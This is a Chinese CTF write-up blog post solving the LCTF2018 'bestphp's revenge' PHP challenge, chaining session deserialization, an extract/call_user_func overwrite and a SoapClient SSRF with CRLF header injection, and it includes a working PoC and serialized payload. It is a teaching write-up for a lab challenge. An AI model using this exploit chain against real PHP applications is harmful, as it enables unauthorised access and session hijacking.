session反序列化+SoapClientSSRF+CRLF

最新推荐文章于 2024-07-19 17:26:37 发布
最新推荐文章于 2024-07-19 17:26:37 发布
阅读量716 收藏
点赞数
分类专栏: wp 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/132014393
版权

文章目录

session反序列化+SoapClientSSRF+CRLF

前言

从一道题分析通过session反序列化出发SoapClientSSRF利用CRLF解题

bestphp’s revenge

首页是index.php

index.php

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

好像没什么利用条件,我们通过目录扫描到

flag.php:

only localhost can get flag!session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }
only localhost can get flag!

看这个代码很明显是SSRF漏洞,我们需要通过ssrf访问:http://127.0.0.1/flag.php将flag写入session文件中,最后访问index.php通过var_dump将flag打印出来

我们接着分析index.php:

call_user_func($args1,$args2)函数可以将执行名为:$args1的函数,并且参数为$args2

我们需要利用SoapClient对象去调用不存在的方法,就会触发__call()方法,从而进行SSRF,将flag写入session。但是怎么才能出发__call()方法?

call_user_func()方法的特性

当使用 call_user_func() 调用一个函数时,可以将函数名作为字符串或者一个包含两个元素的数组传递给它。如果传递一个数组,那么数组的第一个元素表示要调用的类或对象,第二个元素表示要调用的方法名

因此,如果我们给call_user_func()传入一个数组,并且第一个元素是SoapClient对象,第二个元素为不存在的方法名,就可以触发SSRF漏洞

这里刚好有一个现成的:

$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);

如果此时$b=call_user_func(),并且$_SESSION的第一个元素是SoapClient对象,那么相当于:

call_user_func(call_user_func,[new SoapClient(...),'welcome_to_the_lctf2018']);
即:
call_user_func([new SoapClient(...),'welcome_to_the_lctf2018'])

调用了SoapClient对象的welcome_to_the_lctf2018()方法,但是该方法不存在,于是就触发了SSRF

如何编写这个SoapClient对象呢?我们此处需要配合CRLF将flag写入指定的session中

SSRF+CRLF组合拳

poc如下:

<?php

$soap = new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php','user_agent'=>"like\r\nCookie: PHPSESSID=leekos\r\n"
,'uri'=>'aaa'));

echo urlencode(serialize($soap));

# O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A32%3A%22like%0D%0ACookie%3A+PHPSESSID%3Dleekos%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

我们在SoapClient的参数的数组中加入user_agent头,然后\r\n代表换行,将Cookie 给插入进来,替换为:leekos(这里有一个非常重要的点,需要使用双引号"包裹,否则\r\n不解析)

这样我们的SoapClient对象的序列化串就编写好了,我们稍后会用到它

我们上面提到$b=call_user_func(),怎么做到的?我们可以利用第一个call_user_func()函数,将$_GET['f']=extract$_POST=array('b'=>'call_user_func') 这个extract()函数将$b覆盖为call_user_func

这样当我们的reset($_SESSION)SoapClient对象时就可以触发ssrf

问题来了,怎么让reset($_SESSION)是该对象呢?

session反序列化

查询gpt, PHP 7.0.33,默认的 serialize_handler 将是 PHP 内置的 php

那么如果我们此时的serialize_handler=php_serialize就会将session数据使用serialize()函数进行序列化,如果我们将传入的数据前加入一个|,存入session文件后,文件内容大致格式如下:

xxx|O:10:SoapClient{yyy}

当此时我们serialize_handler=php时,漏洞来了,php处理器会把|前面的都当作键名,会把后面的O:10:SoapClient{yyy}反序列化,刚好还原为SoapClient对象,这时利用链就造好了

怎么让serialize_handler=php_serialize?

可以借助session_start()函数,通过call_user_func()来调用即可

解题步骤

先将序列化数据以php_serialize处理器存储起来

image-20230731015728438

默认php处理器反序列化导致生成SoapClient对象,同时调用不存在方法触发ssrf

image-20230731015828398

最后通过自定义的cookie访问即可:

image-20230731015942859

总结

这一个题目的综合性还是挺强的,感觉挺巧妙,用到了session反序列化,php内置类SSRF+CRLF的技巧

Tr4n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CRLF测试工具打包文件
12-27
CRLF(Carriage Return Line Feed,回车换行)注入是一种常见的网络安全漏洞,主要发生在Web应用程序中,攻击者可以通过在输入字段中插入CRLF字符序列,来操纵HTTP响应头,可能导致敏感信息泄露、用户会话劫持甚至...
wizz:Java 序列化程序
07-10
威兹Java 序列化器/反序列化器布局支持的格式: 简单的 CSV :此时没有引用,没有转义,没有 CRLF 字节如何使用它: ObjectMapping< Person> mapping = new ObjectMappingBuilder<> ( Person :: new ) .map( ...
Notepad++不显示CRLF的方法
pcj_888的博客
05-28 701
Notepad++不显示CRLF
notepad++替换CRLF为LF
想练武,就得下功夫
09-27 4603
Windows 下写的脚本行尾符默认为 CRLF,而 Unix 下默认为 LF。 因此经常会有这样的情况发生:在 Windows 系统下编辑的文件放在 Unix 下不能正常执行,这时就需要将文件中的 CRLF 替换为 LF 视图 -> 显示符号 -> 显示行尾符 接下来进行替换: (1)快捷键ctrl+f,再点击替换 (2)查找目标输入: \r\n (3)替换输入: \n (4)将查找模式选为扩展 (5)点击全部替换 ...
Notepad++ 替换 CRLF 为 LF
justwaityou1314的博客
03-15 793
xlsx表格最大行最大列 其实就是.max_row和.max_column 最近写个mode,把数据转化为训练集,结果搞出来的每行结尾是CRLF,而老板给的需求是LF,苦思冥想,得出如下说法… 保密打码… 我们直接替换把 \r\n 替换为 \n 当然,在查找模式那边的’扩展’也是要点的 替换之后的效果 别的也没啥说的 ok,那就这样吧~ 欢迎各位大佬留言吐槽,也可以深入交流~ ...
CTFshow-WEB入门-反序列化
feng的博客
02-14 5510
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
CRLF.ZIP_CRLF_lines
09-21
标题"CRLF.ZIP_CRLF_lines"暗示了这个压缩包与文本文件的行结束符有关,特别是从UNIX/Linux系统转换到Windows系统时的行结束符格式。在UNIX和Linux系统中,文本文件通常以LF(Line Feed)字符作为行结束符,而在...
IRC:Craftplacer.IRC是一个.NET Core 3.1库,用于与IRC服务器进行通信以及反序列化IRC消息
02-08
Craftplacer.IRC是一个专为.NET Core 3.1平台设计的库,它提供了与IRC服务器交互的能力,并且能够对IRC消息进行反序列化,使得处理这些消息变得更加方便。 首先,Craftplacer.IRC库的核心功能在于它的连接管理。...
CR LF CRLF转换
03-31
不同的系统使用不同的字符序列来表示一行的结束。在Windows系统中,行尾通常由一个回车字符(CR,Carriage Return)和一个换行字符(LF,Line Feed)组成,合称为CRLF;而在Unix和Linux系统中,仅使用一个换行字符...
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 546
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1129
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全-网络安全及其防护措施12
LS_Ai的博客
07-19 666
软件定义网络(SDN)是一种网络架构,它通过将网络的控制平面(Control Plane)从数据转发平面(Data Plane)中分离出来,并集中在一个控制器中进行管理和配置。SDN通过集中化的控制和灵活的编程接口,提供对网络的动态管理和自动化能力。软件定义广域网(SD-WAN)是一种基于软件定义网络(SDN)技术的广域网解决方案,通过集中控制和智能路由功能,优化多地点分支机构之间的网络连接。SD-WAN通过虚拟化网络功能,简化了广域网的部署和管理,提高了网络性能和应用体验。
Web安全:未验证的重定向和转发.
最新发布
网络安全领域___专研者.
07-19 535
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 920
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
如何保护你的网络安全
m0_70655343的博客
07-15 728
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络安全-网络安全及其防护措施11
LS_Ai的博客
07-19 714
网络安全管理指通过制定策略、采取措施和使用工具,保护网络系统、设备和数据免受未经授权的访问、攻击和破坏。目标是确保网络的保密性、完整性和可用性,防止数据泄露和服务中断。虚拟私人网络(VPN)是一种通过公共网络(如互联网)建立加密通道,使得远程用户可以安全地访问私有网络资源和数据的技术。VPN通过加密和隧道技术保护数据的安全性和隐私性,同时允许用户在不同地理位置之间建立安全的连接。
【网络文明】关注网络安全
Liang_z_的博客
07-13 1010
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1230
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
notepad++ 的回扯是CRLF怎么改成LF
07-22
要将 Notepad++ 的回车换行格式 (CRLF) 改为换行格式 (LF),您可以按照以下步骤进行操作: 1. 打开 Notepad++。 2. 在菜单栏中,选择 "编辑"(Edit) -> "EOL转换"(EOL Conversion)。 3. 在 EOL 转换子菜单中,选择 "转为Unix格式"(Convert to UNIX Format)。 这将把文档中的所有回车换行符转换为换行符 (LF) 格式。请注意,这将改变整个文档的回车换行格式。 如果您只想单独更改某些行的回车换行格式,而不是整个文档,可以按照以下步骤操作: 1. 选择要更改回车换行格式的行。 2. 在菜单栏中,选择 "编辑"(Edit) -> "行操作"(Line Operations)。 3. 在行操作子菜单中,选择 "转为Unix格式(LF)"(Convert to Unix (LF))。 这将仅针对选定的行将回车换行符转换为换行符 (LF) 格式。其他行不受影响。 通过以上步骤,您可以将 Notepad++ 中的回车换行格式 (CRLF) 转换为换行格式 (LF)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值